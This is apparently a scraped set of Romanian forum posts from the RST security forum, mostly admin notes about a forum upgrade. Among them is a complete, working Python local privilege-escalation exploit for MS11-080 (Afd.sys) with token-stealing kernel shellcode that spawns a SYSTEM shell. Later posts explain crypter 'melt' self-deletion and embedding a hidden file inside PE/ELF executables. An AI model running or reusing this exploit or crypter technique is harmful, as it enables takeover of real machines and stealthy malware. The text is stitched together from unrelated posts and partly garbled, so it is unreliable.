Nytro

Gata, uitasem de asta.

O sa mai modificam culorile la tema si sa repara micile probleme care apar. @Anonimul: Da, am modificat multe lucruri, dar totul e ok, doar ca vbSEO probabil isi creeaza un cache si de aceea dureaza cateva minute pana anumite link-uri devin active, adica a functionat ulterior fara sa fac nimic.

GNY Zine, Issue #6 ` ` ` ` ` `-sdy+-` `` .sd/` `/ho` `:hdo` `:hd. ``./sdMMMMMMmy+-` .+dy .oNMMMh. `omMMMmo``:y- `/dMMMMm: `/dMMMm. :hdNMMNdNNMMMMMMMMmhshNMMy +mMMMMMMN. .odNMMMMMMmdN/ `/dNNMMMMMN` `+dMMMMMMm` /MMMMMm `-+sdNMMMMMMMMMMMy ..:NMMMMMysh/ `+NMMMMMM: :h/`:MMMMMMoomh/hMMMMMMy /MMMMMm MMMMMM+::::. yMMMMMd: -MMMMMN MMMMMMMy- sMMMMMM- /MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMs mMMMMM/ /MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo sMMMMM/ /MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo yMMMMN` /MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo NMMMM: /MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo sMMMN- /MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo oMMMh. /MMMMMm `MMMMMM- yMMMMM+ MMMMMN MMMMMMo `yMMh: /MMMMMN. `hMMMMMM- yMMMMMo MMMMMM MMMMMMo`+NNy- /MMMMMMNh/.+mdNMMMMMs :mMMMMMN: MMMMMMs./- MMMMMMdmh+` :yNMMMMMMNNo`-NMMMMMo .hMMMMMMMd. mMMMMMMms. :MMMMMdo. `/hNMMMh. -mMMMMMy` -yMMMh/` .hMMMmo. :NMNh+.` `sMm/ .hMMMMMm- -+-` `-o/` `yms/` -dMy.``` `+NMMMMN. `dh. `sNMNmmmmmmmdyo/::yMMMd` +M: `. /mMMMMMMMMMMMMMMMNNmmy/` Go Null Yourself E-Zine :Md:` `omN+ yNNdhyso++oosyhmNNho-` :yhhyssoshdh+` ...` ``..` Issue #6 - Fall/November 2011 ``......` www.GoNullYourself.org [==================================================================] 0x01 Introduction 0x02 Editorials 0x03 Floating Point Numbers Suck dan 0x04 duper's Code Corner duper 0x05 How Skynet Works: An Intro to Neural Networks elchupathingy 0x06 Defeating NX/DEP With return-to-libc and ROP storm 0x07 A New Kind of Google Mining Shadytel, Inc 0x08 Stupid Shell Tricks teh crew 0x09 An Introduction to Number Theory dan 0x0a Information Security Careers Cheatsheet Dan Guido 0x0b Interview with Dan Rosenberg (bliss) teh crew 0x0c Et Cetera, Etc. teh crew [==================================================================] Download: http://www.exploit-db.com/papers/18168/

O problema stupida cu paginarea, sa vad ce are... Se pare ca apar temporar probleme cu URL rewrite-ul, dar in cateva minute e totul Ok.

MS11-080 Afd.sys Privilege Escalation Exploit ################################################################################ ######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ######## ######### Author: ryujin@offsec.com - Matteo Memelli ######## ######### Spaghetti & Pwnsauce ######## ######### yuck! 0xbaadf00d Elwood@mac&cheese.com ######## ######### ######## ######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ######## ######### for helping out! ######## ######### ######## ######### To my Master Shifu muts: ######## ######### "So that's it, I just need inner peace?" ######## ######### ######## ######### Exploit tested on the following 32bits systems: ######## ######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng ######## ################################################################################ from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER, c_char, c_short, c_ushort, c_int, c_uint, c_ulong, c_void_p, c_long, c_char_p) from ctypes.wintypes import HANDLE, DWORD import socket, time, os, struct, sys from optparse import OptionParser usage = "%prog -O TARGET_OS" parser = OptionParser(usage=usage) parser.add_option("-O", "--target-os", type="string", action="store", dest="target_os", help="Target OS. Accepted values: XP, 2K3") (options, args) = parser.parse_args() OS = options.target_os if not OS or OS.upper() not in ['XP','2K3']: parser.print_help() sys.exit() OS = OS.upper() kernel32 = windll.kernel32 ntdll = windll.ntdll Psapi = windll.Psapi def findSysBase(drvname=None): ARRAY_SIZE = 1024 myarray = c_ulong * ARRAY_SIZE lpImageBase = myarray() cb = c_int(1024) lpcbNeeded = c_long() drivername_size = c_long() drivername_size.value = 48 Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded)) for baseaddy in lpImageBase: drivername = c_char_p("\x00"*drivername_size.value) if baseaddy: Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername, drivername_size.value) if drvname: if drivername.value.lower() == drvname: print "[+] Retrieving %s info..." % drvname print "[+] %s base address: %s" % (drvname, hex(baseaddy)) return baseaddy else: if drivername.value.lower().find("krnl") !=-1: print "[+] Retrieving Kernel info..." print "[+] Kernel version:", drivername.value print "[+] Kernel base address: %s" % hex(baseaddy) return (baseaddy, drivername.value) return None print "[>] MS11-080 Privilege Escalation Exploit" print "[>] Matteo Memelli - ryujin@offsec.com" print "[>] Release Date 28/11/2011" WSAGetLastError = windll.Ws2_32.WSAGetLastError WSAGetLastError.argtypes = () WSAGetLastError.restype = c_int SOCKET = c_int WSASocket = windll.Ws2_32.WSASocketA WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD) WSASocket.restype = SOCKET closesocket = windll.Ws2_32.closesocket closesocket.argtypes = (SOCKET,) closesocket.restype = c_int connect = windll.Ws2_32.connect connect.argtypes = (SOCKET, c_void_p, c_int) connect.restype = c_int class sockaddr_in(Structure): _fields_ = [ ("sin_family", c_short), ("sin_port", c_ushort), ("sin_addr", c_ulong), ("sin_zero", c_char * 8), ] ## Create our deviceiocontrol socket handle client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP, None, 0, 0) if client == ~0: raise OSError, "WSASocket: %s" % (WSAGetLastError(),) try: addr = sockaddr_in() addr.sin_family = socket.AF_INET addr.sin_port = socket.htons(4455) addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1 ## We need to connect to a closed port, socket state must be CONNECTING connect(client, byref(addr), sizeof(addr)) except: closesocket(client) raise baseadd = c_int(0x1001) MEMRES = (0x1000 | 0x2000) PAGEEXE = 0x00000040 Zerobits = c_int(0) RegionSize = c_int(0x1000) written = c_int(0) ## This will trigger the path to AfdRestartJoin irpstuff = ("\x41\x41\x41\x41\x42\x42\x42\x42" "\x00\x00\x00\x00\x44\x44\x44\x44" "\x01\x00\x00\x00" "\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231) ## Allocate space for the input buffer dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE) # Copy input buffer to it kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written)) startPage = c_int(0x00020000) kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written)) ################################# KERNEL INFO ################################## lpDriver = c_char_p() lpPath = c_char_p() lpDrvAddress = c_long() (krnlbase, kernelver) = findSysBase() hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1) HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable") HalDispatchTable -= hKernel HalDispatchTable += krnlbase print "[+] HalDispatchTable address:", hex(HalDispatchTable) halbase = findSysBase("hal.dll") ## WinXP SP3 if OS == "XP": HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3 HalpSetSystemInformation = halbase+0x19436 # Offset for XPSP3 ## Win2k3 SP2 else: HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3 HalpSetSystemInformation = halbase+0x21c60 # Offset for WIN2K3 print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation) print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation) ################################# EXPLOITATION ################################# shellcode_address_dep = 0x0002071e shellcode_address_nodep = 0x000207b8 padding = "\x90"*2 HalDispatchTable0x4 = HalDispatchTable + 0x4 HalDispatchTable0x8 = HalDispatchTable + 0x8 ## tokenbkaddr = 0x00020900 if OS == "XP": _KPROCESS = "\x44" _TOKEN = "\xc8" _UPID = "\x84" _APLINKS = "\x88" else: _KPROCESS = "\x38" _TOKEN = "\xd8" _UPID = "\x94" _APLINKS = "\x98" restore_ptrs = "\x31\xc0" + \ "\xb8" + struct.pack("L", HalpSetSystemInformation) + \ "\xa3" + struct.pack("L", HalDispatchTable0x8) + \ "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \ "\xa3" + struct.pack("L", HalDispatchTable0x4) tokenstealing = "\x52" +\ "\x53" +\ "\x33\xc0" +\ "\x64\x8b\x80\x24\x01\x00\x00" +\ "\x8b\x40" + _KPROCESS +\ "\x8b\xc8" +\ "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\ "\x89\x1d\x00\x09\x02\x00" +\ "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\ "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\ "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\ "\x75\xe8" +\ "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\ "\x8b\xc1" +\ "\x89\x90" + _TOKEN + "\x00\x00\x00" +\ "\x5b" +\ "\x5a" +\ "\xc2\x10" restore_token = "\x52" +\ "\x33\xc0" +\ "\x64\x8b\x80\x24\x01\x00\x00" +\ "\x8b\x40" + _KPROCESS +\ "\x8b\x15\x00\x09\x02\x00" +\ "\x89\x90" + _TOKEN + "\x00\x00\x00" +\ "\x5a" +\ "\xc2\x10" shellcode = padding + restore_ptrs + tokenstealing shellcode_size = len(shellcode) orig_size = shellcode_size # Write shellcode in userspace (dep) kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode, shellcode_size, byref(written)) # Write shellcode in userspace *(nodep) kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode, shellcode_size, byref(written)) ## Trigger Pointer Overwrite print "[*] Triggering AFDJoinLeaf pointer overwrite..." IOCTL = 0x000120bb # AFDJoinLeaf inputbuffer = 0x1004 inputbuffer_size = 0x108 outputbuffer_size = 0x0 # Bypass Probe for Write outputbuffer = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1 IoStatusBlock = c_ulong() NTSTATUS = ntdll.ZwDeviceIoControlFile(client, None, None, None, byref(IoStatusBlock), IOCTL, inputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size ) ## Trigger shellcode inp = c_ulong() out = c_ulong() inp = 0x1337 hola = ntdll.NtQueryIntervalProfile(inp, byref(out)) ## Spawn a system shell, w00t! print "[*] Spawning a SYSTEM shell..." os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32") ############################## POST EXPLOITATION ############################### print "[*] Restoring token..." ## Restore the thingie shellcode = padding + restore_ptrs + restore_token shellcode_size = len(shellcode) trail_padding = (orig_size - shellcode_size) * "\x00" shellcode += trail_padding shellcode_size += (orig_size - shellcode_size) ## Write restore shellcode in userspace (dep) kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode, shellcode_size, byref(written)) ## Write restore shellcode in userspace (nodep) kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode, shellcode_size, byref(written)) ## Overwrite HalDispatchTable once again NTSTATUS = ntdll.ZwDeviceIoControlFile(client, None, None, None, byref(IoStatusBlock), IOCTL, inputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size ) ## Trigger restore shellcode hola = ntdll.NtQueryIntervalProfile(inp, byref(out)) print "[+] Restore done! Have a nice day :)" Sursa: http://www.exploit-db.com/exploits/18176/

dfgdfgdgdf

Update: Am readus link-urile la forma initiala, gen "44039-rst-upgrade-2.rst" E posibil sa apara probleme, in mare am verificat si pare ok, daca ceva nu e in regula, daca apar link-uri invalide va rog sa ma anuntati. PS: Unele link-uri erau de forma "44039-rst-upgrade-2-post-1337.html", acum apar cu ".rst", veti fi redirectionati de pe un astfel de link cu "html". Sper sa nu apara probleme.

O sa ne ocupam si de homepage, in limita timpului disponibil.

Cu tema sper ca vom rezolva in cateva zile. Mai are cineva aceasta problema, cu 10 caractere cand scrie un mesaj valid, adica nu e tot un "quote" de exemplu?

Daca ati fi cautat putin ati fi gasit asta: http://en.wikipedia.org/wiki/Features_new_to_Windows_7 Daca ati vrea sa intrati in detalii: http://channel9.msdn.com/Shows/Going+Deep/Mark-Russinovich-Inside-Windows-7 Cateva detalii tehnice: http://www.slideshare.net/msigeek/windows-7-ver-4

Multumim pentru feedback. Da, principalele probleme sunt: - o tema noua, "unica", ca cea veche, in rest nu avem ce face, sunteti diferiti, aveti gusturi diferite, nu avem cum sa va facem pe plac la toti, dar cred ca vom lasa acele teme, poate le vom modifica putin si ar trebui sa fie ok pentru toata lumea - rescrierea link-urilor si aducerea la vechea forma Cam asta am avea de facut pentru moment, sa speram ca azi vom rezolva problema link-urilor.

RST Upgrade Am facut niste modificari in aceasta seara, am actualizat forumul si am mai facut cateva schimbari minore. Principala problema care trebuia reparata era problema caracterelor speciale, a diacriticelor, care ar trebui sa fie rezolvata. E posibil sa apara destule probleme, de unele sunt constient, de unele inca nu. Daca gasiti o problema sunteti rugati sa postati aici sau sa imi dati un PM. Temele doar au fost instalate, nu am avut timp sa le modificam, insa sunt problematice, atat din punctul de vedere al culorilor, cat si din faptul ca lipsesc niste imagini. Sfatul meu e sa folositi cateva zile tema Default, apoi vom rezolva si aceasta problema. Vom lucra zilele acestea si vor mai interveni schimbari, deci asteptam de asemenea sugestii.

? ? c?ciul? (breve); când semnul este pus deasupra unei litere ce reprezint? o vocal? pentru a indica o pronun?ie scurt? (de exemplu o semivocal?) atunci se nume?te semnul scurt. Â â Î î circumflex; în alte limbi valoarea fonetic? a acestui semn diacritic este diferit?. ? ? ? ? virguli??[2] sau virgul?, plasat? sub literele corespunz?toare s, S, t, T. Variantele cu sedil? sunt foarte r?spândite mai ales în redactarea computerizat?, dar incorecte (vezi articolele ?, ?). Ç ç ? ? sedil?; folosit? de exemplu în limbile francez?, albanez? ?i turc?. Aspectul ei este diferit de cel al virguli?ei folosite în literele române?ti ? ?i ?. Ñ ñ Ã ã tild?; folosit? de exemplu în limbile spaniol? ?i portughez? sau în Alfabetul Fonetic Interna?ional. ? ? Š š há?ek; folosit de exemplu în limbile ceh?, slovac?, sârb?, croat? etc. Ä ä Ö ö trem? sau umlaut; se folose?te de exemplu în limbile finlandez?, suedez?, german?, francez? ?i turc?. È è Ò ò accent grav; folosit de exemplu în limbile francez? ?i italian?. É é Á á accent ascu?it; folosit de exemplu în limbile francez? ?i maghiar?. În limba român? se folose?te uneori la cuvintele-titlu din dic?ionare sau pentru a marca accentul în cuvintele care altfel s-ar confunda, de exemplu: (doi) copíi este diferit de (dou?) cópii.

From 0×90 to 0x4c454554, a journey into exploitation

From 0

Aveti rabdare o zi, doua... Rezolvam.

Stiu, dar nu am avut timp, zilele astea scapam de toate problemele. Dai Copy la Post, dai Edit si Save. Merge asa, dar nu in toate cazurile.

Ori scri prea mult, ori prea putin.

Uhuu, nici nu vreau sa revad codul, e bagat la gramada, am secvente la care inchid intr-un loc cate 7-8 acolade... Da, eram la inceput. Nu sunt adeptul framework-urilor, nu m-am mai ocupat de el, am trecut la C/C++ si altele si nu am mai avut timp.

Sa fim seriosi, ia ganditi-va, cati dintre voi ati schimbat statusurile cuiva? Destui...

Nu e nevoie, sunt cateva comenzi, cea mai importanta "del" sau "rm". Pentru auto-updater e alt principiu. Vezi undeva pe web ultima versiune, o descarci, si fac un "installer" pentru acel update. Adica faci un alt programel/script care copiaza fisierele dintr-un folder temporar, in folderul cu aplicatia ta, inlocuind aplicatia (care e oprita) si celelalte fisiere necesare, apoi repornind aplicatia. Aplicatia doar ruleaza acel installer si se inchide.

Topicuri create: http://rstcenter.com/forum/search.php?do=finduser&u=35218&starteronly=1 Ban permanent.

Da, tu ai spus-o. De asta am mutat topicul la VIP. Pentru ca nu am vrut sa ajunga pe mana tuturor. Cei de la Yahoo! se misca greu si o sa fim o tara plina de copii fara viitor, care dupa ce ca sunt prosti, o mai si arata.

La cryptere se foloseste o prostie numita "Melt". Nu e tocmai optima, dar isi face treaba: 1. Executabilul creeaza un fisier .bat/.sh care contine cu ciclu care verifica daca exista un fisier (locatia executabilului) 2. Daca exista incearca sa il stearga, daca nu reintra in ciclu 3. Executabilul creeaza acest fisier, il executa si se opreste (procesul) 4. Scriptul sterge executabilul dupa ce se opreste apoi se sterge singur (nu e obligatoriu, poate fi creat in Temp sau /tmp, dar e practic) Asta vrei sa faci?

Ca resurse, trebuie sa cunosti bine formatele PE si ELF si e nasol. Cel mai simplu ar fi asa: - declari variabila x = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" - acea variabila contine, nu stiu, 300KB de 'A' - e salvata intr-o anumita sectiune (de date) din executabil la compilare - cu un alt program, cauti in executabilul compilat acest "AAAAAAAAAAA" - pui acolo un alt fisier, ce vrei sa pui - din programul tau faci ce vrei cu acea variabila, din moment ce acolo pui un alt fisier, trebuie doar sa scrii datele din acea variabila unde vrei - trebuie sa ai grija cu dimensiunea fisierului sau ce pui acolo, sa stii unde sa te opresti - poti folosi un anumit sir, gen "HO_BA" ca sa stii ca acolo se termina datele suprascrise de tine in acel sir "AAA" cu un alt program/hex editor O alta idee e sa scrii acele date "in plus" imediat dupa ultimul octet al programului. - ai grija sa afli corect de unde citesti, ori determini dimensiunea "imaginii" executabilului, ori ca mai sus cu delimitator - poti sa realiniezi structura executabilului sa fie valid - principiu valid si la PE si la ELF Cred ca intelegi ce vreau sa zic.